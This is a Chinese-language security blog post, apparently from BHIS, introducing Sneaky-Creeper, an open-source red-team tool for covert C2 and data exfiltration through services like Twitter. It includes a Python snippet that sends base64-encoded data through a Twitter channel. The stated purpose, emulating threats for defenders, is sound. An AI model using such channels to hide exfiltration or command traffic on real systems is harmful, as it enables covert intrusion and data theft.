我们能实现C2通信吗?当然可以!
Dakota Nelson //
近来,高级攻击者利用合法互联网渠道进行网络数据渗透的情况日益普遍。从Twitter、Tumblr等社交平台,到Dropbox、Soundcloud等实用工具,甚至Salesforce和Google Docs等商业软件,都可能成为命令控制的传输通道。虽然类似FireEye的威胁情报报告能揭示对手的战术技巧,但网络防御者仍需实战经验来应对这类现实威胁。
这正是新型攻击工具的用武之地。
和BHIS所有成员一样,我痴迷于安全研究。这促使我熬过无数个深夜开发出Sneaky-Creeper——一个开源的威胁模拟项目,专门通过合法网络渠道建立隐蔽通信。
其设计追求可读性与易用性:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
from sneakers import Exfil
# 选择实际传输数据的通道
channel = "twitter"
# 编码器支持发送前对数据进行加密/编码处理
encoders = ["b64"]
# 注意:支持多级串联!
# 配置发布内容的API密钥参数
twitter_params = {"key": "xxxx",
"secret": "xxxx",
"token": "xxxx",
"tsecret": "xxxx",
"name": "twitter_account_name"}
data = "任意传输内容"
feed = Exfil(channel, encoders)
feed.set_channel_params({"sending": twitter_params, "receiving": twitter_params})
feed.send(data)
print(feed.receive())
|
该工具由学生团队持续维护,虽然尚存改进空间,但已能有效模拟高级攻击者的通信能力。如果您对非常规C2技术感兴趣,欢迎访问Github项目!
更多Dakota的技术分享请访问其博客Ungineers.com